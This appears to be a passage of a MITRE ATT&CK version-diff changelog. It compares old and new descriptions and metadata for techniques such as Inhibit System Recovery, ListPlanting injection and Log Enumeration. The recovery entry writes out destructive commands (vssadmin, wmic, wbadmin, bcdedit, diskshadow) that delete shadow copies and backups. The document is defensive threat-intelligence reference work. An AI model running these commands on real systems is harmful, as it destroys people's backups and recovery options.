| ies may also delete “online” backups that are connected to t | | ies may also delete “online” backups that are connected to t |
| heir network – whether via network storage media or through | | heir network – whether via network storage media or through |
| folders that sync to cloud services.(Citation: ZDNet Ransomw | | folders that sync to cloud services.(Citation: ZDNet Ransomw |
| are Backups 2020) In cloud environments, adversaries may dis | | are Backups 2020) In cloud environments, adversaries may dis |
| able versioning and backup policies and delete snapshots, ma | | able versioning and backup policies and delete snapshots, da |
| chine images, and prior versions of objects designed to be u | | tabase backups, machine images, and prior versions of object |
| sed in disaster recovery scenarios.(Citation: Dark Reading C | | s designed to be used in disaster recovery scenarios.(Citati |
| ode Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S | | on: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino S |
| 3 Ransomware) | | ecurity Labs AWS S3 Ransomware) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-12 02:30:08.379000+00:00 | 2024-09-24 13:27:31.881000+00:00 |
description | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) |
external_references[8]['description'] | TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022. | TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved September 12, 2024. |
external_references[8]['url'] | https://twitter.com/TheDFIRReport/status/1498657590259109894 | https://x.com/TheDFIRReport/status/1498657590259109894 |
x_mitre_version | 1.4 | 1.5 |
[T1056] Input Capture
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root', 'User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:41.752000+00:00 | 2024-08-13 17:33:45.244000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1559] Inter-Process Communication
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'User', 'SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-11 20:23:23.122000+00:00 | 2024-09-10 19:06:35.666000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1534] Internal Spearphishing
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-02-16 13:09:39.215000+00:00 | 2024-10-15 15:59:36.741000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1059.007] Command and Scripting Interpreter: JavaScript
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-16 21:02:05.142000+00:00 | 2024-07-30 14:12:52.698000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1003.004] OS Credential Dumping: LSA Secrets
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-21 21:12:38.361000+00:00 | 2024-08-13 15:49:17.591000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1003.001] OS Credential Dumping: LSASS Memory
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-12-27 17:57:20.003000+00:00 | 2024-08-13 13:52:45.379000+00:00 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Michael Forret, Quorum Cyber |
[T1569.001] System Services: Launchctl
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'root'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-15 18:40:23.141000+00:00 | 2024-09-20 20:14:35.179000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1055.015] Process Injection: ListPlanting
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may abuse list-view controls to inject malicious | t | Adversaries may abuse list-view controls to inject malicious |
| code into hijacked processes in order to evade process-base | | code into hijacked processes in order to evade process-base |
| d defenses as well as possibly elevate privileges. ListPlant | | d defenses as well as possibly elevate privileges. ListPlant |
| ing is a method of executing arbitrary code in the address s | | ing is a method of executing arbitrary code in the address s |
| pace of a separate live process. Code executed via ListPlant | | pace of a separate live process.(Citation: Hexacorn Listplan |
| ing may also evade detection from security products since th | | ting) Code executed via ListPlanting may also evade detectio |
| e execution is masked under a legitimate process. List-view | | n from security products since the execution is masked under |
| controls are user interface windows used to display collect | | a legitimate process. List-view controls are user interfac |
| ions of items.(Citation: Microsoft List View Controls) Infor | | e windows used to display collections of items.(Citation: Mi |
| mation about an application's list-view settings are stored | | crosoft List View Controls) Information about an application |
| within the process' memory in a <code>SysListView32</code> c | | 's list-view settings are stored within the process' memory |
| ontrol. ListPlanting (a form of message-passing "shatter at | | in a <code>SysListView32</code> control. ListPlanting (a fo |
| tack") may be performed by copying code into the virtual add | | rm of message-passing "shatter attack") may be performed by |
| ress space of a process that uses a list-view control then u | | copying code into the virtual address space of a process tha |
| sing that code as a custom callback for sorting the listed i | | t uses a list-view control then using that code as a custom |
| tems.(Citation: Modexp Windows Process Injection) Adversarie | | callback for sorting the listed items.(Citation: Modexp Wind |
| s must first copy code into the target process’ memory space | | ows Process Injection) Adversaries must first copy code into |
| , which can be performed various ways including by directly | | the target process’ memory space, which can be performed va |
| obtaining a handle to the <code>SysListView32</code> child o | | rious ways including by directly obtaining a handle to the < |
| f the victim process window (via Windows API calls such as < | | code>SysListView32</code> child of the victim process window |
| code>FindWindow</code> and/or <code>EnumWindows</code>) or o | | (via Windows API calls such as <code>FindWindow</code> and/ |
| ther [Process Injection](https://attack.mitre.org/techniques | | or <code>EnumWindows</code>) or other [Process Injection](ht |
| /T1055) methods. Some variations of ListPlanting may alloca | | tps://attack.mitre.org/techniques/T1055) methods. Some vari |
| te memory in the target process but then use window messages | | ations of ListPlanting may allocate memory in the target pro |
| to copy the payload, to avoid the use of the highly monitor | | cess but then use window messages to copy the payload, to av |
| ed <code>WriteProcessMemory</code> function. For example, an | | oid the use of the highly monitored <code>WriteProcessMemory |
| adversary can use the <code>PostMessage</code> and/or <code | | </code> function. For example, an adversary can use the <cod |
| >SendMessage</code> API functions to send <code>LVM_SETITEMP | | e>PostMessage</code> and/or <code>SendMessage</code> API fun |
| OSITION</code> and <code>LVM_GETITEMPOSITION</code> messages | | ctions to send <code>LVM_SETITEMPOSITION</code> and <code>LV |
| , effectively copying a payload 2 bytes at a time to the all | | M_GETITEMPOSITION</code> messages, effectively copying a pay |
| ocated memory.(Citation: ESET InvisiMole June 2020) Finall | | load 2 bytes at a time to the allocated memory.(Citation: ES |
| y, the payload is triggered by sending the <code>LVM_SORTITE | | ET InvisiMole June 2020) Finally, the payload is triggered |
| MS</code> message to the <code>SysListView32</code> child of | | by sending the <code>LVM_SORTITEMS</code> message to the <c |
| the process window, with the payload within the newly alloc | | ode>SysListView32</code> child of the process window, with t |
| ated buffer passed and executed as the <code>ListView_SortIt | | he payload within the newly allocated buffer passed and exec |
| ems</code> callback. | | uted as the <code>ListView_SortItems</code> callback. |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-08 20:59:20.762000+00:00 | 2024-08-14 17:34:33.948000+00:00 |
description | Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows ) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback. | Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows ) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback. |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Hexacorn Listplanting', 'description': 'Hexacorn. (2019, April 25). Listplanting – yet another code injection trick. Retrieved August 14, 2024.', 'url': 'https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/'} |
[T1654] Log Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may enumerate system and service logs to find us | t | Adversaries may enumerate system and service logs to find us |
| eful data. These logs may highlight various types of valuabl | | eful data. These logs may highlight various types of valuabl |
| e insights for an adversary, such as user authentication rec | | e insights for an adversary, such as user authentication rec |
| ords ([Account Discovery](https://attack.mitre.org/technique | | ords ([Account Discovery](https://attack.mitre.org/technique |
| s/T1087)), security or vulnerable software ([Software Discov | | s/T1087)), security or vulnerable software ([Software Discov |
| ery](https://attack.mitre.org/techniques/T1518)), or hosts w | | ery](https://attack.mitre.org/techniques/T1518)), or hosts w |
| ithin a compromised network ([Remote System Discovery](https | | ithin a compromised network ([Remote System Discovery](https |
| ://attack.mitre.org/techniques/T1018)). Host binaries may b | | ://attack.mitre.org/techniques/T1018)). Host binaries may b |
| e leveraged to collect system logs. Examples include using ` | | e leveraged to collect system logs. Examples include using ` |
| wevtutil.exe` or [PowerShell](https://attack.mitre.org/techn | | wevtutil.exe` or [PowerShell](https://attack.mitre.org/techn |
| iques/T1059/001) on Windows to access and/or export security | | iques/T1059/001) on Windows to access and/or export security |
| event information.(Citation: WithSecure Lazarus-NoPineapple | | event information.(Citation: WithSecure Lazarus-NoPineapple |
| Threat Intel Report 2023)(Citation: Cadet Blizzard emerges | | Threat Intel Report 2023)(Citation: Cadet Blizzard emerges |
| as novel threat actor) In cloud environments, adversaries ma | | as novel threat actor) In cloud environments, adversaries ma |
| y leverage utilities such as the Azure VM Agent’s `CollectGu | | y leverage utilities such as the Azure VM Agent’s `CollectGu |
| estLogs.exe` to collect security logs from cloud hosted infr | | estLogs.exe` to collect security logs from cloud hosted infr |
| astructure.(Citation: SIM Swapping and Abuse of the Microsof | | astructure.(Citation: SIM Swapping and Abuse of the Microsof |
| t Azure Serial Console) Adversaries may also target central | | t Azure Serial Console) Adversaries may also target central |
| ized logging infrastructure such as SIEMs. Logs may also be | | ized logging infrastructure such as SIEMs. Logs may also be |
| bulk exported and sent to adversary-controlled infrastructur | | bulk exported and sent to adversary-controlled infrastructur |
| e for offline analysis. | | e for offline analysis. In addition to gaining a better und |
| | | erstanding of the environment, adversaries may also monitor |
| | | logs in real time to track incident response procedures. Thi |
| | | s may allow them to adjust their techniques in order to main |
| | | tain persistence or evade defenses.(Citation: Permiso GUI-Vi |
| | | l 2023) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-30 22:18:46.711000+00:00 | 2024-10-15 12:24:40.892000+00:00 |
description | Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis. | Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023) |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Permiso GUI-Vil 2023', 'description': 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor. Retrieved August 30, 2024.', 'url': 'https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/'} |
x_mitre_contributors | | Menachem Goldstein |
[T1204.002] User Execution: Malicious File
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
t | An adversary may rely upon a user opening a malicious file i | t | An adversary may rely upon a user opening a malicious file i |
| n order to gain execution. Users may be subjected to social | | n order to gain execution. Users may be subjected to social |
| engineering to get them to open a file that will lead to cod | | engineering to get them to open a file that will lead to cod |
| e execution. This user action will typically be observed as | | e execution. This user action will typically be observed as |
| follow-on behavior from [Spearphishing Attachment](https://a | | follow-on behavior from [Spearphishing Attachment](https://a |
| ttack.mitre.org/techniques/T1566/001). Adversaries may use s | | ttack.mitre.org/techniques/T1566/001). Adversaries may use s |
| everal types of files that require a user to execute them, i | | everal types of files that require a user to execute them, i |
| ncluding .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and | | ncluding .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cp |
| .cpl. Adversaries may employ various forms of [Masqueradin | | l, and .reg. Adversaries may employ various forms of [Masqu |
| g](https://attack.mitre.org/techniques/T1036) and [Obfuscate | | erading](https://attack.mitre.org/techniques/T1036) and [Obf |
| d Files or Information](https://attack.mitre.org/techniques/ | | uscated Files or Information](https://attack.mitre.org/techn |
| T1027) to increase the likelihood that a user will open and | | iques/T1027) to increase the likelihood that a user will ope |
| successfully execute a malicious file. These methods may inc | | n and successfully execute a malicious file. These methods m |
| lude using a familiar naming convention and/or password prot | | ay include using a familiar naming convention and/or passwor |
| ecting the file and supplying instructions to a user on how | | d protecting the file and supplying instructions to a user o |
| to open it.(Citation: Password Protected Word Docs) While | | n how to open it.(Citation: Password Protected Word Docs) |
| [Malicious File](https://attack.mitre.org/techniques/T1204/0 | | While [Malicious File](https://attack.mitre.org/techniques/T |
| 02) frequently occurs shortly after Initial Access it may oc | | 1204/002) frequently occurs shortly after Initial Access it |
| cur at other phases of an intrusion, such as when an adversa | | may occur at other phases of an intrusion, such as when an a |
| ry places a file in a shared directory or on a user's deskto | | dversary places a file in a shared directory or on a user's |
| p hoping that a user will click on it. This activity may als | | desktop hoping that a user will click on it. This activity m |
| o be seen shortly after [Internal Spearphishing](https://att | | ay also be seen shortly after [Internal Spearphishing](https |
| ack.mitre.org/techniques/T1534). | | ://attack.mitre.org/techniques/T1534). |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-21 12:22:19.740000+00:00 | 2024-09-25 20:50:34.876000+00:00 |
description | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1204.001] User Execution: Malicious Link
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-11 14:43:31.706000+00:00 | 2024-09-10 16:40:03.786000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1556] Modify Authentication Process
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-11 21:51:44.851000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[7] | Office 365 | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1556.006] Modify Authentication Process: Multi-Factor Authentication
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 00:20:21.488000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1621] Multi-Factor Authentication Request Generation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-19 04:26:29.365000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[6] | Azure AD | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1090.003] Proxy: Multi-hop Proxy
Current version: 2.2
Version changed from: 2.1 → 2.2
|
|
t | Adversaries may chain together multiple proxies to disguise | t | Adversaries may chain together multiple proxies to disguise |
| the source of malicious traffic. Typically, a defender will | | the source of malicious traffic. Typically, a defender will |
| be able to identify the last proxy traffic traversed before | | be able to identify the last proxy traffic traversed before |
| it enters their network; the defender may or may not be able | | it enters their network; the defender may or may not be able |
| to identify any previous proxies before the last-hop proxy. | | to identify any previous proxies before the last-hop proxy. |
| This technique makes identifying the original source of the | | This technique makes identifying the original source of the |
| malicious traffic even more difficult by requiring the defe | | malicious traffic even more difficult by requiring the defe |
| nder to trace malicious traffic through several proxies to i | | nder to trace malicious traffic through several proxies to i |
| dentify its source. For example, adversaries may construct | | dentify its source. For example, adversaries may construct |
| or use onion routing networks – such as the publicly availab | | or use onion routing networks – such as the publicly availab |
| le [Tor](https://attack.mitre.org/software/S0183) network – | | le [Tor](https://attack.mitre.org/software/S0183) network – |
| to transport encrypted C2 traffic through a compromised popu | | to transport encrypted C2 traffic through a compromised popu |
| lation, allowing communication with any device within the ne | | lation, allowing communication with any device within the ne |
| twork.(Citation: Onion Routing) In the case of network infr | | twork.(Citation: Onion Routing) Adversaries may also use ope |
| astructure, it is possible for an adversary to leverage mult | | rational relay box (ORB) networks composed of virtual privat |
| iple compromised devices to create a multi-hop proxy chain ( | | e servers (VPS), Internet of Things (IoT) devices, smart dev |
| i.e., [Network Devices](https://attack.mitre.org/techniques/ | | ices, and end-of-life routers to obfuscate their operations. |
| T1584/008)). By leveraging [Patch System Image](https://atta | | (Citation: ORB Mandiant) In the case of network infrastru |
| ck.mitre.org/techniques/T1601/001) on routers, adversaries c | | cture, it is possible for an adversary to leverage multiple |
| an add custom code to the affected network devices that will | | compromised devices to create a multi-hop proxy chain (i.e., |
| implement onion routing between those nodes. This method is | | [Network Devices](https://attack.mitre.org/techniques/T1584 |
| dependent upon the [Network Boundary Bridging](https://atta | | /008)). By leveraging [Patch System Image](https://attack.mi |
| ck.mitre.org/techniques/T1599) method allowing the adversari | | tre.org/techniques/T1601/001) on routers, adversaries can ad |
| es to cross the protected network boundary of the Internet p | | d custom code to the affected network devices that will impl |
| erimeter and into the organization’s Wide-Area Network (WAN) | | ement onion routing between those nodes. This method is depe |
| . Protocols such as ICMP may be used as a transport. Simil | | ndent upon the [Network Boundary Bridging](https://attack.mi |
| arly, adversaries may abuse peer-to-peer (P2P) and blockchai | | tre.org/techniques/T1599) method allowing the adversaries to |
| n-oriented infrastructure to implement routing between a dec | | cross the protected network boundary of the Internet perime |
| entralized network of peers.(Citation: NGLite Trojan) | | ter and into the organization’s Wide-Area Network (WAN). Pr |
| | | otocols such as ICMP may be used as a transport. Similarl |
| | | y, adversaries may abuse peer-to-peer (P2P) and blockchain-o |
